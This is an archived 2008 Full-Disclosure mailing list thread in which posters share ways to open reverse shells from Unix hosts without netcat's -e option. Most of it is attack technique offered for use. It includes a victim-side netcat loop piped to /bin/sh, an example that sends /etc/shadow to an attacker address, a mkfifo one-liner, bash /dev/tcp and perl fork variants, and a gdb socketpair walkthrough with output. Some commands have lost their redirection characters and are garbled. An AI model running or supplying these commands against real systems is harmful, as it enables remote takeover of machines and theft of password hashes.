[Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE
Recently a friend of mine asked me a seemingly simple question. What is the easiest method to get a reverse shell from a *nix based system using Netcat. He then added a caveat, that he did not want worry about recompiling the source to enable the GAPING_SECURITY_HOLE option that allows you to bind a shell using -e. My first thought was to say Dude go check Google and stop bothering me with this piddly shit, however I have in the past had this same discussion with others and trying to construct a Google search string and get meaningful results on this subject can prove very irritating. Because of this I gave in and told him the method I use which is laid out below. I then had the thought that I should post it somewhere else so it was a little easier for the next person to find. I say somewhere else because I can only assume that I am not the first person to post this method. While the method below does not provide a TRUE interactive shell it is the next best thing and is more than suitable for most hacking endeavours, including simple interactive steps like setting passwords. I know there are other methods out there but I like this one as it provides an easy method without worrying if any particular scripting language was installed or the proper options were compiled in with the default shell. There will undoubtedly be debate on what the best ports are to use and whether or not this is even a recommended way to do things. I chose ports 53 80 as they are the ones that I find have the most success of getting out of a network untouched. As with all things any number of factors can get in the way of proper communication using this method. STEP (1) On the attacker host open a terminal window that you want to receive the output of your commands in and run. nc -k -v -l 80 STEP (2) On the attacker host open a terminal window that you want to enter in your commands and run. nc -k -v -l 53 STEP (3) On the victim host run. while true ; do nc Attacker_IP 53 | /bin/sh ; done You should then see a message appear in the window opened in STEP (2) similar to - Connection from Victim_IP port 53 accepted NOTE: I use the -k options and while loops in these steps to ensure that if there is any intermittent communication issues I don't have to re-establish any of the sessions. Assuming that there are no communication issues like firewalls, routing, DNS, PEBCAK errors, etc...getting in the way, then the command you entered in STEP (3) will connect to the session started in STEP (2). Great now what? you ask. Well all you do is enter the commands you want to run in the STEP (2) window using the formatting below and the output will display in the window opened for STEP (1) Syntax : command | nc Attacker_IP 80 Example: cat /etc/shadow | nc 10.10.10.10 80 There are lots of variations on this using multiple hosts and single ports but I leave that up to you to experiment. That's it and happy hunting... --545945 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE
On Fri, Sep 19, 2008 at 3:01 PM, 545945 [EMAIL PROTECTED] wrote: Recently a friend of mine asked me a seemingly simple question. What is the easiest method to get a reverse shell from a *nix based system using Netcat. He then added a caveat, that he did not want worry about recompiling the source to enable the GAPING_SECURITY_HOLE option that allows you to bind a shell using -e. My first thought was to say Dude go check Google and stop bothering me with this piddly shit, however I have in the past had this same discussion with others and trying to construct a Google search string and get meaningful results on this subject can prove very irritating. Because of this I gave in and told him the method I use which is laid out below. I then had the thought that I should post it somewhere else so it was a little easier for the next person to find. I say somewhere else because I can only assume that I am not the first person to post this method. snip Or you could just grab cryptcat and be done with it, if I understand what you're after. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE
Funny I actually saw your reply before my original post with the method in it was posted. The question was he wanted the easiest method using Netcat. On a system that you may not have a lot of access to (i.e. one you are running an exploit against) downloading cryptcat and running that would be a lot harder since it is not included in any of the standard *Nix distros, where as Netcat usually is. So the goal is to get a reverse shell using as little effort as possible and if the ability exists without having to run a bunch of commands on a remote server then why not. But you are correct as I stated in the original post, there is more than one way to do this. In the end it is the results that make them happy getting there is one's own choice. On Fri, Sep 19, 2008 at 6:28 PM, Kurt Buff [EMAIL PROTECTED] wrote: On Fri, Sep 19, 2008 at 3:01 PM, 545945 [EMAIL PROTECTED] wrote: Recently a friend of mine asked me a seemingly simple question. What is the easiest method to get a reverse shell from a *nix based system using Netcat. He then added a caveat, that he did not want worry about recompiling the source to enable the GAPING_SECURITY_HOLE option that allows you to bind a shell using -e. My first thought was to say Dude go check Google and stop bothering me with this piddly shit, however I have in the past had this same discussion with others and trying to construct a Google search string and get meaningful results on this subject can prove very irritating. Because of this I gave in and told him the method I use which is laid out below. I then had the thought that I should post it somewhere else so it was a little easier for the next person to find. I say somewhere else because I can only assume that I am not the first person to post this method. snip Or you could just grab cryptcat and be done with it, if I understand what you're after. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE
mkfifo /tmp/a; while true; do { sleep 1; nc IP 80 /tmp/a|/bin/
bash/tmp/a; } done
Il giorno 20/set/08, alle ore 01:25, 545945 ha scritto:
Funny I actually saw your reply before my original post with the
method in it was posted. The question was he wanted the easiest
method using Netcat. On a system that you may not have a lot of
access to (i.e. one you are running an exploit against) downloading
cryptcat and running that would be a lot harder since it is not
included in any of the standard *Nix distros, where as Netcat usually
is. So the goal is to get a reverse shell using as little effort as
possible and if the ability exists without having to run a bunch of
commands on a remote server then why not. But you are correct as I
stated in the original post, there is more than one way to do this.
In the end it is the results that make them happy getting there is
one's own choice.
On Fri, Sep 19, 2008 at 6:28 PM, Kurt Buff [EMAIL PROTECTED]
wrote:
On Fri, Sep 19, 2008 at 3:01 PM, 545945 [EMAIL PROTECTED] wrote:
Recently a friend of mine asked me a seemingly simple
question. What
is the easiest method to get a reverse shell from a *nix based
system using
Netcat. He then added a caveat, that he did not want worry about
recompiling the source to enable the GAPING_SECURITY_HOLE option
that
allows you to bind a shell using -e. My first thought was to
say Dude go
check Google and stop bothering me with this piddly shit, however
I have in
the past had this same discussion with others and trying to
construct a
Google search string and get meaningful results on this subject
can prove
very irritating. Because of this I gave in and told him the
method I use
which is laid out below. I then had the thought that I should
post it
somewhere else so it was a little easier for the next person to
find. I say
somewhere else because I can only assume that I am not the first
person to
post this method.
snip
Or you could just grab cryptcat and be done with it, if I understand
what you're after.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE
If you're using a non-crippled bash (anything non-debian/ubuntu) you
can connect a shell to a tcp socket directly like this;
On controlhost:
nc -l -p 31337
On slavehost:
bash -c 3/dev/tcp/controlhost.com/31337 ; bash 3 3 23
If you are using a crippled (debian) bash you have to jump through an
extra hoop;
On slavehost:
nc controlhost.com 31337 /dev/ptyp0 10 20
setsid bash /dev/ttyp0 0 20
Now these days some systems may not have the old /dev/ttypX style
devices (the new /dev/ptmx stuff requires you to do an ioctl to poke
it into working, which is tricky to do from bash although could be
done through gdb or a scripting language easily enough).
If you're going to use gdb though.. there are an unlimited number of
ways to skin the cat. Possibly the simplest is just to use
socketpair() to create a pair of connected sockets.
[EMAIL PROTECTED]:~$ gdb bash
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i486-linux-gnu...
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(gdb) break main
Breakpoint 1 at 0x80606d1
(gdb) run
Starting program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 1, 0x080606d1 in main ()
(gdb) call malloc(2)
$1 = 135237640
(gdb) call socketpair(1,1,0,$1)
$2 = 0
(gdb) continue
Continuing.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[EMAIL PROTECTED]:~$ ls -l /proc/self/fd
total 0
lrwx-- 1 rm rm 64 2008-09-20 03:57 0 - /dev/pts/11
lrwx-- 1 rm rm 64 2008-09-20 03:57 1 - /dev/pts/11
lrwx-- 1 rm rm 64 2008-09-20 03:57 2 - /dev/pts/11
lr-x-- 1 rm rm 64 2008-09-20 03:57 3 - pipe:[122802]
l-wx-- 1 rm rm 64 2008-09-20 03:57 4 - pipe:[122802]
lr-x-- 1 rm rm 64 2008-09-20 03:57 5 - /bin/bash
lrwx-- 1 rm rm 64 2008-09-20 03:57 6 - socket:[122839]
lrwx-- 1 rm rm 64 2008-09-20 03:57 7 - socket:[122840]
lr-x-- 1 rm rm 64 2008-09-20 03:57 8 - /proc/19126/fd
[EMAIL PROTECTED]:~$
As you can see we have a nice extra pair of connected sockets here:
[EMAIL PROTECTED]:~$ nc controlhost.com 6 6 26
[1] 19416
[EMAIL PROTECTED]:~$ setsid bash -i 7 7 27
[2] 19468
[EMAIL PROTECTED]:~$ exit
exit
Program exited normally.
(gdb) quit
(You now have a bash shell connected to controlhost)
Okay so that's a bit fiddly and does depend on gdb -- but I'm sure it
wouldn't be difficult to script up.
You could do something similar with a perl script or a small C program
-- all you need to do is call socketpair() and then fork off nc and
bash.
on slavehost:
[EMAIL PROTECTED]:~$ perl -e '$^F=100; socketpair(rd,wr,1,1,0); if (fork()) {
exec(setsid bash -i 3 3 23); } else { exec (nc
controlhost.com 31337 4 4 24); }'
[1] 20768
I'm sure the same thing could be rigged up in most scripting languages.
Rob.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
